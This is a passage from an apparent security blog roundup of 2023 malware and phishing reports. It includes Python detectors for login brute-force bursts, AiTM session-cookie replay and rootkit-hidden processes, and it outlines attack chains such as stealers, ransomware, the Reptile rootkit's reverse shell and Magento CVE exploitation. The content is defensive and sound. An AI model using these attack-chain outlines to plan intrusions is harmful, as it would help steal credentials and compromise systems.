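Aug 14 10:02:49 edge sshd[2300]: Accepted password for alice from 10.0.0.9 port 40022 ssh2
2023-08-14 10:05:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
2023-08-14 10:05:03.42 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.7]
2023-08-14 10:05:04.07 Logon       Login failed for user 'sql'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.7]
2023-08-14 10:05:06.88 Logon       Login failed for user 'test'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.7]
2023-08-14 10:05:07.15 Logon       Login failed for user 'backup'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.7]
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()


def parse_line(line: str, year: int = 2023) -> Optional[Tuple[datetime, str, str]]:
    """Return (timestamp, user, source) for a failed-login line, else None."""
    m = SSHD_RE.match(line)
    if m:
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        return ts, m["user"], m["src"]
    m = MSSQL_RE.match(line)
    if m:
        return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["src"]
    return None


def detect_bursts(lines: List[str], window_seconds: int = 60,
                  min_failures: int = 5, min_users: int = 3) -> Dict[str, dict]:
    """Per source, find the densest window of failures and the accounts tried."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, user, src = parsed
            events[src].append((ts, user))
    report = {}
    for src, evs in events.items():
        evs.sort()
        peak, peak_users, start = 0, set(), 0
        for end in range(len(evs)):  # sliding window over sorted timestamps
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > peak:
                peak = end - start + 1
                peak_users = {u for _, u in evs[start:end + 1]}
        burst = peak >= min_failures
        report[src] = {
            "failures": len(evs),
            "peak_in_window": peak,
            "distinct_users": len(peak_users),
            "burst": burst,
            "dictionary_attack": burst and len(peak_users) >= min_users,
        }
    return report


if __name__ == "__main__":
    for src, info in detect_bursts(SAMPLE_LINES).items():
        print(src, info)
```

Separating `burst` from `dictionary_attack` keeps the two failure modes distinct: a single account hammered with many passwords (brute force against a known login) and many accounts tried a few times each (a credential list, the KmsdBot pattern) warrant different responses, and a lone user mistyping a password triggers neither.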

Focus on DroxiDat/SystemBC

Securelist published an article describing the use of a backdoor named DroxiDat along with a penetration testing tool called Cobalt Strike, to compromise industrial infrastructure.

DroxiDat is a more compact backdoor variant of SystemBC, capable of gathering general system and hardware information and exfiltrating it to a C2 server. In addition, it can interact with the file system and modify registry hives. Moreover, it contains a mini Tor client for dark web communication.

The Cobalt Strike beacons are varied and were manually added to the infected system through a previous credential stealing attack.

Old exploit kits still kicking around in 2023

Malwarebytes Labs discovered that exploit kits targeting Internet Explorer are still being developed and capable of delivering new malware.

The researched samples are RIG EK, which drops other complex malware such as Lumma Stealer on the victim system, and PurpleFox EK, a framework with rootkit capabilities.

LummaC Stealer Leveraging Amadey Bot to Deploy SectopRAT

Cyble published an article about LummaC, an information stealer that deploys additional malware on the victim’s computer, making the infection even more difficult to combat.

The malware is initially distributed through phishing websites, disguised as setup files promoted via YouTube. Once installed, it starts to collect data from the victim and sends it to the C2 server.

Furthermore, LummaC starts to install Amadey bot malware which can also steal data and load additional malicious payloads, communicating with the C2 server and receiving commands from it. The primary feature of Amadey is its capability to deploy other payloads to all compromised computers.

Ultimately, SectopRAT is delivered to the victim’s computer; it can create a hidden secondary desktop and manipulate browser sessions. SectopRAT is also equipped with anti-analysis mechanisms.

Mac systems turned into proxy exit nodes by AdLoad

AT&T released a report regarding the use of the AdLoad malware to turn macOS systems into infected proxy servers.

AdLoad is considered adware and bundleware, responsible for downloading, loading and executing the next malicious stages of an attack.

The current researched scenario includes a proxy client application being delivered, as a payload, by AdLoad in order to transform the victim system into a peer-to-peer proxy node.

The malware collects hardware information about the system and decides if it is suited to be a working node. In addition, it communicates with multiple C2 servers for further instructions.

LOLKEK Unmasked | An In-Depth Analysis of New Samples and Evolving Tactics

SentinelOne released a report presenting details about the continuous evolution of a ransomware labeled as LOLKEK, targeting small and medium size companies.

LOLKEK can be described as ransomware that can be easily modified even by attackers with little technical knowledge. In addition, it can be bought at a much lower price than other ransomware programs.

It removes the volume shadow copies to make recovery impossible, then encrypts files on the system and on other pluggable devices.

Xurum: New Magento Campaign Discovered

Akamai researchers have discovered that multiple well-known vulnerabilities have been exploited to compromise web servers running Magento, a framework used in e-commerce.

CVE-2022-24086 lets attackers inject a foreign template into the Magento engine in order to execute remote PHP code. Once exploited, the attackers download a versatile webshell from a public GitHub repository of a security researcher and execute it in memory.

Finally, the attackers can gather purchase history and credit card information.

Another vulnerability, CVE-2016-5195 (Dirty COW), has been used for privilege escalation.

Statc Stealer: Decoding the Elusive Malware Threat

Zscaler ThreatLabz published an article regarding a new information stealer family labeled Statc Stealer, capable of gathering cookies, login credentials and other sensitive information stored in the browser.

The campaign starts from malicious Google advertisements which download onto the victim machine an executable that stages the next malicious payloads to be deployed and executed.

The main program, Statc Stealer, which is written in C++ and can only target the Windows platform, is brought onto the victim system by a PowerShell downloader.

Besides information stealing, the malware has anti-analysis capabilities against sandbox environments which are frequently used for malware research.

The captured data is finally exfiltrated to the C2 server, disguised as HTTP requests.

GuLoader Malware Disguised as Tax Invoices and Shipping Statements (Detected by MDS Products)

Ahnlab has published a report about GuLoader malware being distributed via email and used to install remote access tools.

The malware is disguised as tax invoices or shipping statements, and, once run, it can download malware such as Remcos, AgentTesla, Vidar and other remote access tools from the threat actor’s server.

The threat actor uses downloaders such as GuLoader to propagate commercial malware. This approach helps evade security products that rely on signature-based detection.

Ahnlab has published a report about a malware that is distributed via an executable and a Word file, disguised with coin exchange and investment-related topics.

At first glance, the malware executables look like normal Word and PDF files, but they contain commands that access a specific URL: after a file is executed, a normal-looking document is generated while the script code hosted at the malicious URL is run. Its behavior is not known.

The document file has the text color in the body set to gray, manipulating users into clicking the Enable Content button. Upon clicking this button, the code embedded in the document is executed and it downloads another script.

Currently, the exact script that is ultimately executed cannot be identified due to the C2 being inaccessible. However, it has the potential for various malicious behaviors such as exfiltrating user credentials and downloading additional malware.

TargetCompany Ransomware Abuses FUD Obfuscator Packers

Trend Micro discovered a novel attack pattern that combines the Remcos remote access trojan, TargetCompany ransomware and fully undetectable (FUD) binary packers.

The attack originates from vulnerable SQL servers, on which attackers can achieve remote code execution, deploy and run the Remcos RAT, gain persistence and download the next stages.

Since Remcos and TargetCompany ransomware can be detected by antivirus solutions, a custom-made packer in the form of a batch file is used to decrypt the binary payloads of the aforementioned programs.

The attacker also downloads third-party tools such as Metasploit, IObit Unlocker and many more.

Comrades in Arms? | North Korea Compromises Sanctioned Russian Missile Engineering Company

SentinelLabs has published a report about an intrusion into the Russian missile engineering organization NPO Mashinostroyeniya by a North Korean threat actor.

The threat actor used a malicious file named OpenCarrot, a Windows backdoor also used in the past by the Lazarus group. This version can reach the external C2 server either directly or through internal network hosts.

The report states that the threat actor had likely been operating on the compromised Russian server for an extended period before their team discovered it in May 2022, after which all operations paused until February 2023.

For malware delivery, the threat actor communicated with a domain that impersonates Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

Talos published an article regarding the use of the Yashma ransomware strain by a Vietnamese group.

The ransomware is a rebranded version of Chaos ransomware, and it is written in .NET.

In order to evade detection, the ransom note is not embedded into the malicious binary sample, but it is downloaded from a remote GitHub repository once the ransomware starts its execution. In addition, it presents anti-recovery features, by deleting the original unencrypted files.

Latest Batloader Campaigns Use Pyarmor Pro for Evasion

Trend Micro has published a report about a threat actor using Batloader access malware together with Pyarmor Pro to obfuscate its primary malicious Python scripts.

The chain begins with an action script embedded in a large MSI file. The script checks whether it has administrator rights on the victim machine and, if not, executes a command from a corrupted file. Once it has obtained administrator rights, it installs WinRAR and extracts two archives that contain files used by the malware.

One obfuscated Python script from the archive sends the victim's IP address to the C2 server, after which it receives the malicious payload from the remote server.

STRRAT’s Latest Version Incorporates Dual Obfuscation Layers

Cyble published a report regarding the use of a Java-based, doubly obfuscated remote access trojan called STRRAT to steal credentials stored in browsers and capture keystrokes.

The initial infection vector is phishing emails carrying a PDF file that contains a URL. If the victim clicks on a special icon within the document, a JavaScript dropper is downloaded from that URL. The script later deploys the STRRAT malware.

This program is obfuscated using two tools (Allatori and Zelix KlassMaster) in order to hinder the investigation process.

It also achieves persistence on the system and gathers sensitive information which is later exfiltrated to the C2 server. Some variants also include a ransomware module called Crimson.

Ransomware Roundup – DoDo and Proton

Fortinet has warned users about two ransomware programs known as DoDo and Proton, describing their features and behavior.

DoDo ransomware is a variant of Chaos ransomware and has been observed being delivered while masquerading as Mercurial Grabber, an open-source information stealer published for educational purposes. DoDo has a very destructive attribute: it wipes files larger than 1MB, rendering them unrecoverable even when the ransom is paid.

The spread of the Proton ransomware is still under investigation. Once executed, it encrypts files and changes their icons.

Both ransomware families target only the Windows platform.

Sophisticated SiMay RAT Spreads Via Telegram Phishing Site

Cyble published an article warning about a trojanized Telegram installer infecting Chinese systems in order to deploy a remote access tool and steal sensitive information.

The initial step is a Telegram installer bundled with a malicious executable that acts as a downloader for the attack's later stages. The download technique identified is unusual: it chains several web requests through intermediate URLs in order to resolve the final URL hosting the next malware programs.

The next stages consist of deploying and executing a remote access tool that can capture keystrokes, screenshots and interact with the file system.

Midnight Blizzard conducts targeted social engineering over Microsoft Teams

Microsoft has published a report about a threat actor that uses compromised Microsoft 365 tenants to create domains that appear as technical support entities.

First, the target receives a Teams message request from an external user posing as technical support or a security team, who tries to convince them to enter a code into the Microsoft Authenticator app.

If the user complies, the threat actor is granted a token to authenticate as the targeted user, gaining access to the victim's account. This allows the threat actor to perform cyber espionage and information theft.

From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud

Microsoft has published a report about a phishing campaign using AiTM phishing sites to achieve financial fraud.

The attacker sends emails to different users telling them that they have received a voice message.

The mail contains an HTML attachment that redirects to an intermediate page, which checks that the visitor came from the original attachment. Next, the user lands on a phishing page that proxies the Azure Active Directory sign-in page. There the target enters their credentials, authenticates and is redirected to the legitimate office.com page, while in the background the attacker intercepts the credentials.

Beyond stealing the credentials, the AiTM technique places a proxy server between the user and the website, which allows the attacker to extract the session cookie issued after authentication.

In the end, the attacker uses the stolen session cookie to authenticate to the victim's mailbox and commit payment fraud. This is achieved by hijacking and replying to ongoing finance-related email threads, luring the target into sending money through fake invoices.
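The defensive implication of the AiTM flow above is that MFA was satisfied once, by the victim, and the resulting session was then used from somewhere else. The detection below is an added example written for this post, not code from Microsoft or from the blog. It runs over constructed sign-in events (field names are an assumption, modelled on normalised Entra ID sign-in logs; IPs are from documentation ranges) and reports a session when a later event with the same session ID comes from both a different IP and a different user agent than the interactive sign-in that created it. Because the proxy sits between the user and the real site, the interactive sign-in itself carries the proxy's IP, so an origin IP outside the user's baseline is recorded as a second reason.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in events (field names are an assumption).
SAMPLE_SIGNINS = [
    # alice: MFA sign-in arrives via the AiTM proxy, then the session is
    # replayed 20 minutes later from a different host with a scripted client.
    {"time": datetime(2023, 8, 1, 9, 0), "user": "alice@example.com", "session_id": "S1",
     "interactive": True, "ip": "203.0.113.10",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/115.0"},
    {"time": datetime(2023, 8, 1, 9, 20), "user": "alice@example.com", "session_id": "S1",
     "interactive": False, "ip": "198.51.100.7",
     "user_agent": "python-requests/2.31"},
    # bob: normal token refresh from the same workstation.
    {"time": datetime(2023, 8, 1, 8, 30), "user": "bob@example.com", "session_id": "S2",
     "interactive": True, "ip": "192.0.2.5",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0) Edg/115.0"},
    {"time": datetime(2023, 8, 1, 10, 0), "user": "bob@example.com", "session_id": "S2",
     "interactive": False, "ip": "192.0.2.5",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0) Edg/115.0"},
    # carol: phone moved from Wi-Fi to mobile data; IP changed, client did not.
    {"time": datetime(2023, 8, 1, 7, 45), "user": "carol@example.com", "session_id": "S3",
     "interactive": True, "ip": "192.0.2.9", "user_agent": "Outlook-iOS/2.0"},
    {"time": datetime(2023, 8, 1, 8, 15), "user": "carol@example.com", "session_id": "S3",
     "interactive": False, "ip": "192.0.2.44", "user_agent": "Outlook-iOS/2.0"},
]

# Constructed per-user baseline of IPs seen in the preceding weeks (assumption).
BASELINE_IPS = {
    "alice@example.com": {"192.0.2.20"},
    "bob@example.com": {"192.0.2.5"},
    "carol@example.com": {"192.0.2.9", "192.0.2.44"},
}


def detect_aitm_session_replay(events, baseline_ips, window=timedelta(hours=24)):
    """Flag sessions whose cookie appears to have been replayed from another host.

    Requiring both IP and user agent to change avoids alerting on a device
    that merely switched networks (carol). The origin-IP baseline check adds
    a second reason when the MFA sign-in itself came from an unfamiliar
    address, which is what an AiTM proxy looks like in the logs.
    """
    by_session = defaultdict(list)
    for ev in events:
        by_session[ev["session_id"]].append(ev)

    alerts = []
    for session_id, evs in by_session.items():
        evs.sort(key=lambda e: e["time"])
        origin = next((e for e in evs if e["interactive"]), None)
        if origin is None:
            continue  # no interactive sign-in on record for this session
        for ev in evs:
            if ev is origin or ev["time"] < origin["time"]:
                continue
            if ev["time"] - origin["time"] > window:
                break
            if ev["ip"] != origin["ip"] and ev["user_agent"] != origin["user_agent"]:
                reasons = ["session_reused_from_new_host"]
                if origin["ip"] not in baseline_ips.get(origin["user"], set()):
                    reasons.append("origin_ip_outside_baseline")
                alerts.append({"user": origin["user"], "session_id": session_id,
                               "origin_ip": origin["ip"], "replay_ip": ev["ip"],
                               "reasons": reasons})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_aitm_session_replay(SAMPLE_SIGNINS, BASELINE_IPS):
        print(alert)
```

In practice the alert with both reasons present is the one worth revoking sessions over; a single-reason alert from a user who travels frequently deserves a look at the replaying client's user agent before action.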

Reptile Malware Targeting Linux Systems

Ahnlab has published a report about an open-source Linux kernel mode rootkit malware named Reptile that provides a concealment feature for files, directories, processes, and network communications.

Its installation provides a listener command-line tool that waits for connection details on a port. It includes a reverse shell that connects to a C2 server and lets threat actors easily take control of systems.

The reverse shell can be triggered either at install time or through port knocking, waiting for a magic packet to be received on a specific port.

Reptile can also grant the current user root privileges and hide or reveal files, directories, PIDs and TCP/UDP network connections, based on commands received from the C2 server.
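A rootkit that hides PIDs generally does so by filtering what `/proc` returns on readdir(), but it rarely also patches every other kernel path that reveals a process. The script below is an added example written for this post, not code from Ahnlab or from the Reptile project: it applies the classic cross-view technique of comparing the `/proc` listing against a `kill(pid, 0)` probe of every possible PID. Thread IDs also answer `kill(2)`, so a candidate is only reported when its `/proc/<pid>/status` is unreadable (hidden outright) or reports `Tgid == pid` (a process that readdir() failed to return). The pure comparison is separated from the live collectors so it can be tested on constructed data.

```python
import os


def find_hidden_pids(listed, probed, read_tgid):
    """Return PIDs that answer a signal-0 probe but are missing from the /proc listing.

    `listed`   : set of PIDs returned by readdir() on /proc
    `probed`   : set of PIDs for which kill(pid, 0) did not report ESRCH
    `read_tgid`: callable returning the Tgid for a pid, or None when
                 /proc/<pid>/status cannot be read
    """
    hidden = []
    for pid in sorted(probed - listed):
        tgid = read_tgid(pid)
        if tgid is None or tgid == pid:
            hidden.append(pid)          # either fully hidden or a hidden leader
        # tgid != pid means this is a thread of a visible process: expected
    return hidden


def listed_pids():
    """PIDs as returned by readdir() on /proc, the view a rootkit typically filters."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def probed_pids(max_pid):
    """PIDs that exist according to kill(pid, 0), which bypasses /proc entirely."""
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue                    # ESRCH: no such process or thread
        except PermissionError:
            pass                        # EPERM: exists, owned by another user
        alive.add(pid)
    return alive


def read_tgid_from_proc(pid):
    """Read the Tgid field of /proc/<pid>/status; None if the entry is unreadable."""
    try:
        with open(f"/proc/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except OSError:
        return None
    return None


def scan(max_pid=None):
    """Live scan of the local host; a clean system returns an empty list."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as fh:
            max_pid = int(fh.read())
    # List /proc both before and after the probe so a process created during
    # the scan is not mistaken for a hidden one. A process that both starts
    # and exits inside that window can still be reported; rerun to confirm.
    before = listed_pids()
    probed = probed_pids(max_pid)
    after = listed_pids()
    return find_hidden_pids(before | after, probed, read_tgid_from_proc)


if __name__ == "__main__":
    print("suspicious PIDs:", scan())
```

Run as root on Linux so that `PermissionError` does not mask anything; a non-empty result is worth a look with a second, independent view (for example `ss`/`netstat` output against the hidden process's sockets) before concluding a rootkit is present.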

Sliver C2 Being Distributed Through Korean Program Development Company

Ahnlab has published a report about fake VPN installers that distribute Sliver C2.

Once the installers are on the victim's computer, they download Sliver C2, which allows the threat actor to control the infected system. To run Sliver C2, Notepad.exe is used as the target for process injection.

Notably, some of the files are disguised as font files but are actually malicious installers, and some of them are signed with a valid company certificate.

Sneaky XWorm Uses MultiStaged Attack

Cyble published a report regarding a novel technique to deploy and execute a commodity malware named XWorm in a way that minimizes detection.

The initial stage is an LNK file attached to phishing emails. Once executed, it starts a complex multi-stage attack that uses as many legitimate built-in programs as possible (mainly PowerShell, batch files, cmd and VBScript) to execute payloads decrypted from the LNK file.

XWorm can monitor keystrokes and mouse activity, use the webcam and microphone, capture screenshots, listen for network connections, and more.


